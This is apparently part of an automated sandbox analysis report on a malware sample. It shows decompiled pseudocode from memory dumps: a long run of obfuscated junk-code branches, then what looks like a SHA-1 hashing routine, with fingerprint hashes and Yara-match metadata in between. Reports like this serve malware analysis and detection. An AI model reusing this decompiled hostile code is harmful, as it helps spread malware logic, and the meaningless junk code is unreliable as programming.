            																__edi = 0xa7914f23 +  *0xc6ffe660 * 0xedf1;
            																__eflags = __ebx -  *0x71ba16f8;
            																if(__ebx !=  *0x71ba16f8) {
            																	goto L1;
            																} else {
            																	 *0x6fcc297a =  *0x6fcc297a >> 0xcc;
            																	asm("adc [0xe52229b0], ch");
            																	asm("sbb bh, 0x28");
            																	__eax = __eax | 0xa1cb993d;
            																	_push( *0x7ae35129);
            																	 *0x2a96af86 = __dl;
            																	__ebp = 0xc4bdbc9c;
            																	__ebx = __ebx +  *0x2bfcbc6f;
            																	__eflags = __ebx;
            																	if(__ebx >= 0) {
            																		goto L1;
            																	} else {
            																		asm("ror dword [0x847b5173], 0x7e");
            																		__bh = __bh |  *0xd0a4ece6;
            																		asm("rcr dword [0x1c008f92], 0x10");
            																		 *0xd3987534 =  *0xd3987534 << 0xa4;
            																		asm("lodsd");
            																		_pop(__esp);
            																		 *0x546ed5d7 = __ah;
            																		 *0xfcd6401e =  *0xfcd6401e + __eax;
            																		__eflags =  *0xde77b73b - __ecx;
            																		asm("rcl dword [0xb038270d], 0x5d");
            																		if( *0xde77b73b < __ecx) {
            																			goto L1;
            																		} else {
            																			__esp = __esp | 0xbc341078;
            																			__esi = __esi + 1;
            																			 *0x6658b036 =  *0x6658b036 & 0xc4bdbc9c;
            																			__ebx = __ebx | 0x75e38661;
            																			asm("ror dword [0x735d7262], 0xba");
            																			__al = 0x24;
            																			__ecx = __ecx |  *0xa9f6693e;
            																			__esp = __esp |  *0x463008db;
            																			asm("sbb [0x913be383], edx");
            																			_pop(__eax);
            																			__edx = __edx |  *0x59a7130e;
            																			_t36 = __eax;
            																			__eax =  *0x2ce134f5;
            																			 *0x2ce134f5 = _t36;
            																			__edx = __edx + 1;
            																			asm("movsb");
            																			__eflags = __bh & 0x000000ca;
            																			__ecx = __ecx ^  *0xecd8b8c4;
            																			asm("rol dword [0x9aa37a11], 0xfc");
            																			 *0x32fec48b =  *0x32fec48b + __ecx;
            																			__edx = __edx |  *0x2c67641e;
            																			 *0x61ce0cf =  *0x61ce0cf & __esp;
            																			__eflags = __ch & 0x00000004;
            																			 *0xe4a119ff =  *0xe4a119ff << 0x3a;
            																			_pop(__ebp);
            																			_push( *0x787a9165);
            																			__esi = __esi + 0xd96b498c;
            																			__ebx = __ebx | 0xd49f836d;
            																			__al = 0x00000024 &  *0x673b7a2c;
            																			 *0x6c56a339 =  *0x6c56a339 + __esp;
            																			__esp = __esp +  *0xf32985a3;
            																			__ebx = __ebx ^  *0xcb874796;
            																			asm("rol byte [0xb3de3234], 0xa9");
            																			__ecx = __ecx +  *0x99fe70bc;
            																			__eflags = __ecx;
            																			asm("lodsb");
            																			if(__ecx != 0) {
            																				goto L1;
            																			} else {
            																				__edx = __edx -  *0x5152ff7a;
            																				__edi = __edi ^  *0x20712df1;
            																				 *0x3feb16db =  *0x3feb16db >> 0x9b;
            																				__eflags =  *0x3feb16db;
            																				_t41 = __eax;
            																				__eax =  *0x5862cf33;
            																				 *0x5862cf33 = _t41;
            																				asm("rol byte [0x342fd604], 0xb6");
            																				__ecx = 0xb1ad29bb;
            																				if( *0x3feb16db > 0) {
            																					goto L1;
            																				} else {
            																					 *0x80d1477 =  *0x80d1477 >> 0x49;
            																					asm("adc ebx, [0x6ce58964]");
            																					 *0xca2a2f25 =  *0xca2a2f25 >> 0x4b;
            																					 *0x4eb0c21d =  *0x4eb0c21d >> 0xa7;
            																					__eflags =  *0x4eb0c21d;
            																					_push(0xd97868d3);
            																					if( *0x4eb0c21d <= 0) {
            																						goto L1;
            																					} else {
            																						__edi =  *0xc536757e * 0x5957;
            																						__eflags = __edi;
            																						if(__edi <= 0) {
            																							goto L1;
            																						} else {
            																							__ebx = __ebx -  *0x906c576;
            																							__eax = __eax - 1;
            																							__eflags = __eax;
            																							if(__eax <= 0) {
            																								goto L1;
            																							} else {
            																								__eflags = __esp -  *0x3b804a76;
            																								if(__esp <=  *0x3b804a76) {
            																									goto L1;
            																								} else {
            																									__esp =  *0xba63127e * 0x4abf;
            																									asm("rol byte [0xe9991028], 0x40");
            																									__eflags =  *0xba63127e * 0x4abf -  *0x56d43c13;
            																									__esp =  *0x89de076b * 0x6309;
            																									 *0x296e2fe5 =  *0x296e2fe5 - __cl;
            																									__eflags =  *0x296e2fe5;
            																									__ch =  *0x4561700a;
            																									if( *0x296e2fe5 >= 0) {
            																										goto L1;
            																									} else {
            																										__esi =  *0xa335757d * 0x3d27;
            																										__eax =  *0x1b550a6b * 0x6dc2;
            																										__esi =  *0xa335757d * 0x3d27 +  *0x27a335b9;
            																										__esp = 0x8d166b3d;
            																										__edi = __edi - 1;
            																										asm("sbb edx, [0xca7339eb]");
            																										__ecx = 0xffffffffb1ad29bc;
            																										 *0xddf44a66 =  *0xddf44a66 << 0x69;
            																										__eflags =  *0xddf44a66;
            																										if( *0xddf44a66 != 0) {
            																											goto L1;
            																										} else {
            																											__ebp = 0x31cde9e6;
            																											__eflags = 0xc4bdbc9c - 0x2bf6af39;
            																											 *0xdc7802d =  *0xdc7802d << 1;
            																											__eflags =  *0x41c61f37 - __edx;
            																											__edi = __edi +  *0xd830f48b;
            																											asm("adc [0xc0a9566c], eax");
            																											 *0xa9db150a - __dh = __eax - 0xb9694d94;
            																											__eflags =  *0xaee81fa2 - __ah;
            																											asm("stosd");
            																											__eflags =  *0x44c3b3f1 & 0xc4bdbc9c;
            																											 *0x43dd6827 =  *0x43dd6827 - __eax;
            																											_push( *0xf9108b9d);
            																											__edi =  *0xc7181211;
            																											__ebp = 0x31cde9e7;
            																											__ecx = 0xffffffffb1ad29bd;
            																											__eflags =  *0x990d1de & __edx;
            																											__al = 0x63;
            																											__eflags = __ch - 0xe5;
            																											asm("sbb eax, [0xc296e2f]");
            																											__cl = __cl + 0x28;
            																											__ebp = 0x31cde9e7 &  *0xb57b66ee;
            																											__eflags = __ebx -  *0x98097b9;
            																											 *0x19c19bd6 = 0xc4bdbc9c;
            																											asm("rol byte [0x99f70f22], 0x10");
            																											asm("adc [0xc40d07a9], eax");
            																											__edi =  *0xc7181211 + 0x1a038ad3;
            																											__eflags =  *0x7040fabd & __eax;
            																											__edx = __edx |  *0x7200396;
            																											asm("sbb edi, [0xb1da383b]");
            																											asm("rcr dword [0x594c0e85], 0x16");
            																											__ecx = 0xffffffffb1ad29bd -  *0x7ac78d09;
            																											__esi = __esi -  *0x5b668c83;
            																											_push( *0xec3f2e25);
            																											 *0x8b50e212 =  *0x8b50e212 << 0x89;
            																											__eflags =  *0x8b50e212;
            																											if( *0x8b50e212 > 0) {
            																												goto L1;
            																											} else {
            																												__eflags =  *0x9d4c077 & 0x8d166b3d;
            																												__edi = __edi -  *0x4c0023e;
            																												 *0x14be5731 =  *0x14be5731 >> 0xbc;
            																												__edx = __edx - 1;
            																												_pop(__eax);
            																												asm("rcr byte [0x13d10b63], 0xa9");
            																												__eflags =  *0x2c41f2fc & __esi;
            																												__ecx =  *0xee374b6a * 0xf74;
            																												__esi = __esi | 0xe3b82285;
            																												 *0xc4a539f8 =  *0xc4a539f8 ^ 0x8d166b3d;
            																												__eflags =  *0xc4a539f8;
            																												if( *0xc4a539f8 < 0) {
            																													goto L1;
            																												} else {
            																													 *0x970f5372 =  *0x970f5372 >> 0xc9;
            																													asm("adc [0x18717765], esi");
            																													__esp =  *0x113e661;
            																													asm("adc bl, 0x24");
            																													asm("ror dword [0x9ea3a86c], 0xd6");
            																													__eflags =  *0x4282f330 & 0x0000003c;
            																													if(( *0x4282f330 & 0x0000003c) >= 0) {
            																														goto L1;
            																													} else {
            																														__edi =  *0x665c347d * 0xba1d;
            																														__ebx =  *0x3a6e8c60 * 0xeca;
            																														 *0x4607e13e =  *0x4607e13e >> 0x68;
            																														__ebx =  *0x69ae9864;
            																														 *0xec3f2e25 =  *0xec3f2e25 << 0x73;
            																														asm("adc ah, 0x14");
            																														__esi = __esi ^ 0x8e4ba9fc;
            																														 *0xe5c1c0c5 =  *0xe5c1c0c5 | __ecx;
            																														__edx = __edx &  *0xd8346ddb;
            																														asm("movsw");
            																														 *0x74ddb0e5 & 0x00000063 =  *0x12e80666 & __eax;
            																														_push( *0x141df49f);
            																														asm("movsb");
            																														 *0x375b6e3c =  *0x375b6e3c & __dl;
            																														 *0x446cd6e6 =  *0x446cd6e6 ^ __ah;
            																														__eflags =  *0x584a14be & __ecx;
            																														 *0x73471363 =  *0x73471363 & __dl;
            																														 *0x8afc6668 =  *0x8afc6668 >> 0x1b;
            																														__edi =  *0x665c347d * 0x0000ba1d |  *0xf40577cb;
            																														__eflags = __edi;
            																														_push(0x2f1f756d);
            																														if(__edi > 0) {
            																															goto L1;
            																														} else {
            																															__esi =  *0xc488707f * 0x125b;
            																															_push(__eax);
            																															__ecx = __ecx +  *0xfad56ded;
            																															 *0x629b11b1 =  *0x629b11b1 + __ah;
            																															__eflags =  *0x4a68d620 & 0x0000003c;
            																															__ebx = __ebx ^  *0x584a14be;
            																															 *0x635c1363 =  *0x635c1363 | __bh;
            																															 *0x2a178a0b =  *0x2a178a0b << 0xf5;
            																															_t62 = __ebp;
            																															__ebp =  *0xe9338c6e;
            																															 *0xe9338c6e = _t62;
            																															__ebx = __ebx | 0x33194835;
            																															__eflags = __ebx;
            																															if(__ebx > 0) {
            																																goto L1;
            																															} else {
            																																__ebp =  *0xc488707f * 0x165b;
            																																__edx = __edx +  *0x7682976c;
            																																__edx = __edx &  *0x76c99a0d;
            																																__ebp = 1 +  *0xc488707f * 0x165b;
            																																__eflags =  *0x63ebc07 - __edx;
            																																__esp = __esp ^ 0xebaee9d1;
            																																_t63 = __edi;
            																																__edi =  *0xc774fbdc;
            																																 *0xc774fbdc = _t63;
            																																__esi = __esi |  *0x452cc616;
            																																 *0xd66acc35 =  *0xd66acc35 | __edx;
            																																__eflags =  *0xc774fbdc -  *0x635ac5f1;
            																																__edi =  *0xb86f336a * 0x6c25;
            																																__esp = __esp -  *0x74fbdceb;
            																																 *0xba420cc7 =  *0xba420cc7 << 0xf2;
            																																__esp =  *0x5b05c0d5;
            																																 *0xd609809c & __edx =  *0x270bc19b - __edx;
            																																 *0xfef51cbe =  *0xfef51cbe - __esp;
            																																__esp = __esp +  *0x374b6af3;
            																																 *0xcb0c74ee = __eax;
            																																 *0xd237462d =  *0xd237462d - __ebx;
            																																_pop(__eax);
            																																 *0xd609808b =  *0xd609808b >> 0xaf;
            																																_t66 = __esi;
            																																__esi =  *0x7914c19b;
            																																 *0x7914c19b = _t66;
            																																__ebp = 0x00000001 +  *0xc488707f * 0x0000165b | 0x74e1f8d8;
            																																 *0x342d2c02 & __dl = __bh - 0xc9;
            																																 *0xbc9dff85 =  *0xbc9dff85 - __ebp;
            																																 *0x6674dd92 =  *0x6674dd92 >> 0xd0;
            																																__edi =  *0xb86f336a * 0x00006c25 | 0x7612e806;
            																																asm("cmpsw");
            																																asm("adc ecx, [0x1494e5be]");
            																																__edi = ( *0xb86f336a * 0x00006c25 | 0x7612e806) ^  *0x4b76e339;
            																																 *0x7f5078d5 =  *0x7f5078d5 << 0x58;
            																																__edx = __edx &  *0x6352400f;
            																																__eax = 0xe6f3db0f;
            																																 *0xed741fdc =  *0xed741fdc - __edx;
            																																asm("rcr dword [0xf6f44026], 0xf5");
            																																__esp = __esp + 1;
            																																_pop( *0x17716327);
            																																__cl = __cl & 0x00000086;
            																																asm("movsw");
            																																__eflags =  *0x5fd39bdb - __esp;
            																																_pop(__ebx);
            																																__esi =  *0x7914c19b &  *0x366b5de;
            																																__ecx = 0x8fbd6d8b;
            																																 *0x4b9ff4dd =  *0x4b9ff4dd << 0x3a;
            																																 *0xcb40ac61 =  *0xcb40ac61 & __edx;
            																																__edx = __edx |  *0xd8fc9f0d;
            																																 *0x13f7f964 =  *0x13f7f964 >> 0x11;
            																																asm("sbb esp, 0xa9566c95");
            																																__eax = 0xe6f3db0f -  *0xfc100ac0;
            																																__ebx = __ebx - 1;
            																																__eflags = __ebx;
            																																if(__ebx > 0) {
            																																	goto L1;
            																																} else {
            																																	__esi = __esi -  *0x184b3777;
            																																	asm("adc esp, [0x91dce766]");
            																																	__eflags = __ebp -  *0x2fe56309;
            																																	_t69 = __esi;
            																																	__esi =  *0xcc0e296e;
            																																	 *0xcc0e296e = _t69;
            																																	__esi =  *0xcc0e296e -  *0x37008bd9;
            																																	__edx = __edx &  *0x62875d0f;
            																																	__eflags = __edx;
            																																	_pop(__ebx);
            																																	__ecx = 0xec3f2e25;
            																																	asm("rol dword [0x4aa7f71d], 0xb3");
            																																	asm("ror dword [0x12cc8e85], 0xcc");
            																																	asm("rcl dword [0xd90755a3], 0x8");
            																																	if(__edx <= 0) {
            																																		goto L1;
            																																	} else {
            																																		__esi = __esi ^  *0x31521d76;
            																																		__eflags = __esi;
            																																		if(__eflags != 0) {
            																																			goto L1;
            																																		} else {
            																																			asm("ror dword [0xee4d927b], 0xc2");
            																																			if(__eflags > 0) {
            																																				goto L1;
            																																			} else {
            																																				__ebx =  *0x505bd67f * 0x6382;
            																																				_t70 = __edx;
            																																				__edx =  *0x284abfba;
            																																				 *0x284abfba = _t70;
            																																				__eflags =  *0xf118de0b & __edi;
            																																				__ch = __ch | 0x000000b2;
            																																				asm("ror byte [0x4b6af13c], 0x3e");
            																																				__ebp = __ebp |  *0xc74ee37;
            																																				__eax = 0x2872e995;
            																																				asm("adc esp, 0x809550dd");
            																																				 *0xc19bd609 =  *0xc19bd609 >> 0x76;
            																																				_pop( *0x1d274f0d);
            																																				__al = 0xe2;
            																																				__ebx =  *0x505bd67f * 0x6382 - 0x7f6bb01;
            																																				asm("adc eax, [0xc0a9566c]");
            																																				asm("ror byte [0x39d0c0a], 0xb1");
            																																				asm("sbb edi, [0x58c92e2d]");
            																																				__ecx = 0xec3f2e25 +  *0xd6098094;
            																																				__edi = __edi ^  *0x3d15c19b;
            																																				 *0x15d91912 =  *0x15d91912 >> 0xed;
            																																				 *0x1a0bfebb - __edi = __esi - 0x8fff7bc5;
            																																				__bh = __bh - 0xe4;
            																																				_pop( *0xbc87ef66);
            																																				__cl = __cl ^ 0x00000032;
            																																				__edi = __edi +  *0x450c8b9b;
            																																				asm("movsw");
            																																				__ecx = 0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8;
            																																				 *0x9bd60980 =  *0x9bd60980 | __cl;
            																																				 *0x49360ec1 & __edx =  *0x301d86fd & __edx;
            																																				asm("adc edi, 0x5b23cb65");
            																																				__eflags =  *0xec3f2e25 & __edx;
            																																				asm("rol dword [0x16ef6611], 0x9f");
            																																				__eflags =  *0xf302390f & __esp;
            																																				asm("sbb esi, 0x98a20011");
            																																				asm("adc [0xbeed8a2e], edi");
            																																				__edx = __edx + 1;
            																																				__eflags = __esp -  *0xf9ae0eff;
            																																				__ecx = (0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8) ^  *0x9843f1f1;
            																																				asm("adc ebp, [0x5b534409]");
            																																				 *0xec3f2e25 =  *0xec3f2e25 << 0x93;
            																																				__ecx = ((0xec3f2e25 +  *0xd6098094 |  *0x4a02bdc8) ^  *0x9843f1f1) -  *0x22fd7e1e;
            																																				asm("sbb [0xbb915318], al");
            																																				__edx = __edx |  *0x355fc5bd;
            																																				__eflags = __edx;
            																																				asm("adc [0xc3ffb3dc], esi");
            																																				asm("sbb cl, 0x1c");
            																																				_pop(__ebx);
            																																				asm("rol dword [0x1fd18116], 0x4d");
            																																				_push( *0x7338fad4);
            																																				if(__edx >= 0) {
            																																					goto L1;
            																																					do {
            																																						do {
            																																							do {
            																																								goto L1;
            																																							} while ( *0x18340f6b * 0x3515 != 0);
            																																							asm("adc bl, [0x84018fe5]");
            																																							 *0x12718061 = _t100;
            																																							asm("adc ecx, [0x21e3bb36]");
            																																							asm("adc ebx, [0x24d12037]");
            																																							asm("sbb [0x5b1a54e2], cl");
            																																							 *0xff4d63c0 =  *0xff4d63c0 & _t100;
            																																							_push(_t119 |  *0x63600b9a);
            																																							_pop(_t119);
            																																							 *0x380eb915 = 0xf9a3822b;
            																																							asm("adc [0xc80cbe61], ebx");
            																																							asm("cmpsb");
            																																							asm("movsw");
            																																							asm("sbb ebx, [0xe03caab8]");
            																																							asm("rcr byte [0x26863eb6], 0xda");
            																																							_t100 =  *0x77828863;
            																																							_t117 = _t117 | 0x35d0a6bd;
            																																						} while (_t117 != 0);
            																																						_pop(_t92);
            																																					} while (_t92 >  *0x7bb4ad75);
            																																					 *0x36516130 = _t110;
            																																					 *0x8529e462 =  *0x8529e462 | _t119;
            																																					asm("adc [0x9527ecc4], eax");
            																																					asm("rcl dword [0xc4411223], 0x76");
            																																					asm("adc [0x82293618], bh");
            																																					_t90 = 1 +  *0xfcefa97f * 0xa4fe;
            																																					_push(_t100);
            																																					asm("lodsb");
            																																					asm("adc [0x598c3f17], ecx");
            																																					 *0xd0f946fc = _t90;
            																																					asm("rcl dword [0x5d778409], 0xd1");
            																																					return _t90;
            																																				} else {
            																																					 *0xe70a1171 =  *0xe70a1171 >> 0x94;
            																																					_push(__ecx);
            																																					__eax =  *0x3007ab0f;
            																																					__eax =  *0x3007ab0f + 1;
            																																					__eflags = __eax;
            																																					asm("adc ecx, [0xd95e5bdb]");
            																																					_t81 = __bh;
            																																					__bh =  *0x2744f622;
            																																					 *0x2744f622 = _t81;
            																																					asm("ror byte [0xd40f7163], 0x30");
            																																					return __eax;
            																																				}
            																																			}
            																																		}
            																																	}
            																																}
            																															}
            																														}
            																													}
            																												}
            																											}
            																										}
            																									}
            																								}
            																							}
            																						}
            																					}
            																				}
            																			}
            																		}
            																	}
            																}
            															}
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}














            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID: %.?
            • API String ID: 0-1143580271
            • Opcode ID: 025e3457ae5a36a25f275044e8c7c38624274b10e1d040c2d593b7973b9fe61d
            • Instruction ID: 848145a389a9de07ec6dd436e04fd650184e3768f10c99e6a1b2a73db0ff74fa
            • Opcode Fuzzy Hash: 025e3457ae5a36a25f275044e8c7c38624274b10e1d040c2d593b7973b9fe61d
            • Instruction Fuzzy Hash: 2E627372908381CFDB16CF38DD8AA913FB2F756324B08424ED5A1975D2D7342666CF89
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: c1379558a401881c1aa3f5d640be06d0f5788e9e501cc2392e2440cba8758e50
            • Instruction ID: a3bd86afedebc3027e6fab03184246648387fae3609261a65f267afbaed0cb55
            • Opcode Fuzzy Hash: c1379558a401881c1aa3f5d640be06d0f5788e9e501cc2392e2440cba8758e50
            • Instruction Fuzzy Hash: 2432E274604652DFDB24EF29C480372B7F1BF45300F1885AAE9868F286E735EC56DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0d0db68666f06800bf78f55cfb3ba3b11dadba6b3a49c401c2e2a03b3435c791
            • Instruction ID: 3c4fdc8aa1755e31113050eeab5969d37a6b6b8908f8ad743e58dcdd461e0402
            • Opcode Fuzzy Hash: 0d0db68666f06800bf78f55cfb3ba3b11dadba6b3a49c401c2e2a03b3435c791
            • Instruction Fuzzy Hash: BBD2EE9644F7E22FE3138F745CA4BA3BF6A9E53114B1D42DBE4E1DA193D1084369C3A2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E00409E2C(intOrPtr* _a4) {
            				signed int* _v0;
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				char _v304;
            				signed char* _t277;
            				signed int* _t278;
            				signed int _t279;
            				signed int _t285;
            				signed int _t288;
            				signed int _t292;
            				signed int _t295;
            				signed int _t299;
            				signed int _t303;
            				signed int _t305;
            				intOrPtr _t311;
            				signed int _t319;
            				signed int _t321;
            				signed int _t324;
            				signed int _t326;
            				signed int _t335;
            				signed int _t341;
            				signed int _t342;
            				signed int _t347;
            				signed int _t355;
            				signed int _t359;
            				signed int _t360;
            				signed int _t364;
            				signed int _t367;
            				signed int _t371;
            				signed int _t372;
            				signed int _t401;
            				signed int _t406;
            				signed int _t412;
            				signed int _t415;
            				signed int _t422;
            				signed int _t425;
            				signed int _t434;
            				signed int _t436;
            				signed int _t439;
            				signed int _t447;
            				signed int _t462;
            				signed int _t465;
            				signed int _t466;
            				signed int _t467;
            				signed int _t473;
            				signed int _t481;
            				signed int _t482;
            				intOrPtr* _t483;
            				signed int* _t486;
            				signed int _t493;
            				signed int _t496;
            				signed int _t501;
            				signed int _t504;
            				signed int _t507;
            				signed int _t510;
            				signed int _t511;
            				signed int _t515;
            				signed int _t527;
            				signed int _t530;
            				signed int _t537;
            				void* _t543;
            				void* _t545;
            
            				_push(0x550fc22a);
            				_t543 = _t545;
            				_t486 = _v0;
            				_t355 = 0;
            				_t2 =  &(_t486[7]); // 0x1b
            				_t277 = _t2;
            				do {
            					 *(_t543 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
            					 *(_t543 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
            					_t355 = _t355 + 4;
            					_t277 =  &(_t277[0x10]);
            				} while (_t355 < 0x10);
            				_t278 =  &_v304;
            				_v8 = 0x10;
            				do {
            					_t401 =  *(_t278 - 0x18);
            					_t462 =  *(_t278 - 0x14);
            					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t401;
            					asm("rol ecx, 1");
            					asm("rol ebx, 1");
            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t462;
            					_t278[8] = _t359;
            					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
            					_t278 =  &(_t278[4]);
            					asm("rol ebx, 1");
            					asm("rol edx, 1");
            					_t46 =  &_v8;
            					 *_t46 = _v8 - 1;
            					_t278[6] = _t319 ^ _t401;
            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t462;
            				} while ( *_t46 != 0);
            				_t321 =  *_t486;
            				_t279 = _t486[1];
            				_t360 = _t486[2];
            				_t406 = _t486[3];
            				_v12 = _t321;
            				_v16 = _t486[4];
            				_v8 = 0;
            				do {
            					asm("rol ebx, 0x5");
            					_t465 = _v8;
            					_t493 = _t321 + ( !_t279 & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x14c)) + _v16 + 0x5a827999;
            					_t324 = _v12;
            					asm("ror eax, 0x2");
            					_v16 = _t406;
            					_v12 = _t493;
            					asm("rol esi, 0x5");
            					_v8 = _t360;
            					_t412 = _t493 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x148)) + _v16 + 0x5a827999;
            					_t496 = _t279;
            					asm("ror ebx, 0x2");
            					_v16 = _v8;
            					_t364 = _v12;
            					_v8 = _t324;
            					_t326 = _v8;
            					_v12 = _t412;
            					asm("rol edx, 0x5");
            					_t285 = _t412 + ( !_t364 & _t496 | _t324 & _t364) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x144)) + _v16 + 0x5a827999;
            					_t415 = _v12;
            					_v16 = _t496;
            					asm("ror ecx, 0x2");
            					_v8 = _t364;
            					_v12 = _t285;
            					asm("rol eax, 0x5");
            					_v16 = _t326;
            					_t501 = _t285 + ( !_t415 & _t326 | _t364 & _t415) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x140)) + _v16 + 0x5a827999;
            					_t360 = _v12;
            					_t288 = _v8;
            					asm("ror edx, 0x2");
            					_v8 = _t415;
            					_v12 = _t501;
            					asm("rol esi, 0x5");
            					_v16 = _t288;
            					_t279 = _v12;
            					_t504 = _t501 + ( !_t360 & _t288 | _t415 & _t360) +  *((intOrPtr*)(_t543 + _t465 * 4 - 0x13c)) + _v16 + 0x5a827999;
            					_t406 = _v8;
            					asm("ror ecx, 0x2");
            					_t466 = _t465 + 5;
            					_t321 = _t504;
            					_v12 = _t321;
            					_v8 = _t466;
            				} while (_t466 < 0x14);
            				_t467 = 0x14;
            				do {
            					asm("rol esi, 0x5");
            					asm("ror eax, 0x2");
            					_v16 = _t406;
            					_t507 = _t504 + (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
            					_t335 = _v12;
            					_v12 = _t507;
            					asm("rol esi, 0x5");
            					_t422 = _t507 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
            					asm("ror ebx, 0x2");
            					_t510 = _t279;
            					_v16 = _t360;
            					_t367 = _v12;
            					_v12 = _t422;
            					asm("rol edx, 0x5");
            					asm("ror ecx, 0x2");
            					_t292 = _t422 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
            					_t425 = _v12;
            					_v8 = _t335;
            					_v8 = _t367;
            					_v12 = _t292;
            					asm("rol eax, 0x5");
            					_t467 = _t467 + 5;
            					_t360 = _v12;
            					asm("ror edx, 0x2");
            					_t146 = _t510 + 0x6ed9eba1; // 0x6ed9eb9f
            					_t511 = _t292 + (_t335 ^ _v8 ^ _t425) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x154)) + _t146;
            					_t295 = _v8;
            					_v8 = _t425;
            					_v12 = _t511;
            					asm("rol esi, 0x5");
            					_t406 = _v8;
            					_t504 = _t511 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t543 + _t467 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
            					_v16 = _t295;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t504;
            				} while (_t467 < 0x28);
            				_v8 = 0x28;
            				do {
            					asm("rol esi, 0x5");
            					_v16 = _t406;
            					asm("ror eax, 0x2");
            					_t515 = ((_t360 | _t279) & _t406 | _t360 & _t279) +  *((intOrPtr*)(_t543 + _v8 * 4 - 0x14c)) + _t504 + _v16 - 0x70e44324;
            					_t473 = _v12;
            					_v12 = _t515;
            					asm("rol esi, 0x5");
            					_t341 = _v8;
            					asm("ror edi, 0x2");
            					_t434 = ((_t279 | _t473) & _t360 | _t279 & _t473) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x148)) + _t515 + _v16 - 0x70e44324;
            					_v16 = _t360;
            					_t371 = _v12;
            					_v12 = _t434;
            					asm("rol edx, 0x5");
            					_v8 = _t279;
            					_t436 = ((_t473 | _t371) & _t279 | _t473 & _t371) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x144)) + _t434 + _v16 - 0x70e44324;
            					asm("ror ecx, 0x2");
            					_v16 = _v8;
            					_t299 = _v12;
            					_v8 = _t473;
            					_v12 = _t436;
            					asm("rol edx, 0x5");
            					asm("ror eax, 0x2");
            					_t527 = ((_t371 | _t299) & _t473 | _t371 & _t299) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x140)) + _t436 + _v16 - 0x70e44324;
            					_v16 = _v8;
            					_t439 = _t371;
            					_t360 = _v12;
            					_v8 = _t439;
            					_v12 = _t527;
            					asm("rol esi, 0x5");
            					_v16 = _v8;
            					_t504 = ((_t299 | _t360) & _t439 | _t299 & _t360) +  *((intOrPtr*)(_t543 + _t341 * 4 - 0x13c)) + _t527 + _v16 - 0x70e44324;
            					_t406 = _t299;
            					_t279 = _v12;
            					asm("ror ecx, 0x2");
            					_v12 = _t504;
            					_t342 = _t341 + 5;
            					_v8 = _t342;
            				} while (_t342 < 0x3c);
            				_t481 = 0x3c;
            				_v8 = 0x3c;
            				do {
            					asm("rol esi, 0x5");
            					_t482 = _v8;
            					asm("ror eax, 0x2");
            					_t530 = (_t406 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t543 + _t481 * 4 - 0x14c)) + _t504 + _v16 - 0x359d3e2a;
            					_t347 = _v12;
            					_v16 = _t406;
            					_v12 = _t530;
            					asm("rol esi, 0x5");
            					asm("ror ebx, 0x2");
            					_t447 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x148)) + _t530 + _v16 - 0x359d3e2a;
            					_v16 = _t360;
            					_t372 = _v12;
            					_v12 = _t447;
            					asm("rol edx, 0x5");
            					_v16 = _t279;
            					asm("ror ecx, 0x2");
            					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t543 + _t482 * 4 - 0x144)) + _t447 + _v16 - 0x359d3e2a;
            					_t406 = _v12;
